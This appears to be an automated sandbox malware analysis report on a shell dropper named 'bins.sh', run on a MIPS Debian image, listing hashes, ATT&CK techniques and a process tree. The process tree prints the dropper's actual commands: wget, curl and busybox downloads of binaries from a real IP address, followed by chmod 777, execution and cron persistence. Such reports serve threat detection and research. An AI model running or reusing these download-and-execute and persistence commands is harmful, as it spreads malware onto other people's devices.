3a6cdf4d9eb0d91dc2125de430207fc449a34acb22787078b19b11df5b42ae32

Analysis

max time kernel
123s
max time network
151s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20-02-2025 18:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

1a818bb63a3306ae460a32c139410128
SHA1

a25809c8e4858f91c10123448406631554ab739d
SHA256

3a6cdf4d9eb0d91dc2125de430207fc449a34acb22787078b19b11df5b42ae32
SHA512

3e47969ff983b506139c03ef59f55f7e5983ca8cb590dd0ad4d1c1a62bd6b174ab3aaf1e6f605f07e037b8a7b7f866466ebee7438a93ff86c1b00aeb79997caa
SSDEEP

192:fipgN2oT7Udx7DLs5NzO/IT7UdxTDLs5NmA:fqgN20O/A

Score

8^/10

defense_evasion discovery execution persistence privilege_escalation

Malware Config

Signatures

Contacts a large (1501) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
735	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo	736	bins.sh

Renames itself 1 IoCs

pid	Process
737	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.8b7hlr	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/997/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1020/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1083/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1150/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/21/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/144/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/853/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/969/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/972/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/976/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/985/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/432/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/706/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/794/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/798/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/882/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/921/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/941/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/949/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/80/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/978/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/983/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1055/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1068/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1095/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1134/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1149/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/799/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/864/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1025/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1031/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1044/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1047/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1053/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1084/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/2/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/70/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1046/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1115/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1117/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1129/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/37/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/920/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/928/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1034/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/77/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/711/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/854/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/855/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/896/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/952/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1102/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1124/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/16/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1023/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1032/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1086/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1087/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/1153/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/820/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/924/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/929/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
File opened for reading	/proc/970/cmdline	2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo	wget
File opened for modification	/tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo	curl
File opened for modification	/tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Executes dropped EXE
PID:703
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:707
- /usr/bin/wget
  wget http://37.44.238.88/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  - Writes file to tmp directory
  PID:709
- /usr/bin/curl
  curl -O http://37.44.238.88/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:733
- /bin/busybox
  /bin/busybox wget http://37.44.238.88/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  - Writes file to tmp directory
  PID:734
- /bin/chmod
  chmod 777 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  - File and Directory Permissions Modification
  PID:735
- /tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  ./2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  - Renames itself
  - Reads runtime system information
  PID:736
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:738
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:739
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:740
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:741
- /bin/rm
  rm 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo
  2⤵
  PID:752
- /usr/bin/wget
  wget http://37.44.238.88/bins/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
  2⤵
  PID:757
- /usr/bin/curl
  curl -O http://37.44.238.88/bins/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly
  2⤵
  PID:759

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo

Filesize
151KB

MD5
6c583043d91c55aa470c08c87058e917

SHA1
abf65a5b9bba69980278ad09356e53de8bb89439

SHA256
2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

SHA512
82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Download Submit
/var/spool/cron/crontabs/tmp.8b7hlr

Filesize
210B

MD5
2ba743648f1c5cd1991454d82af4e248

SHA1
79c9beaccf829629c67e2f3baa6d6565f49b5b13

SHA256
1de88490f588fe6e485b31696694cf5ca486809b80213d43e055598ba53ae080

SHA512
54b754c410cc01066c045c15c632f4e9a034edab0061f5131ec8e13d44696c030311e8842e36fdbb5b7ef2226317388250f008194b1ed89bdbf0eb2b589b6f51

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads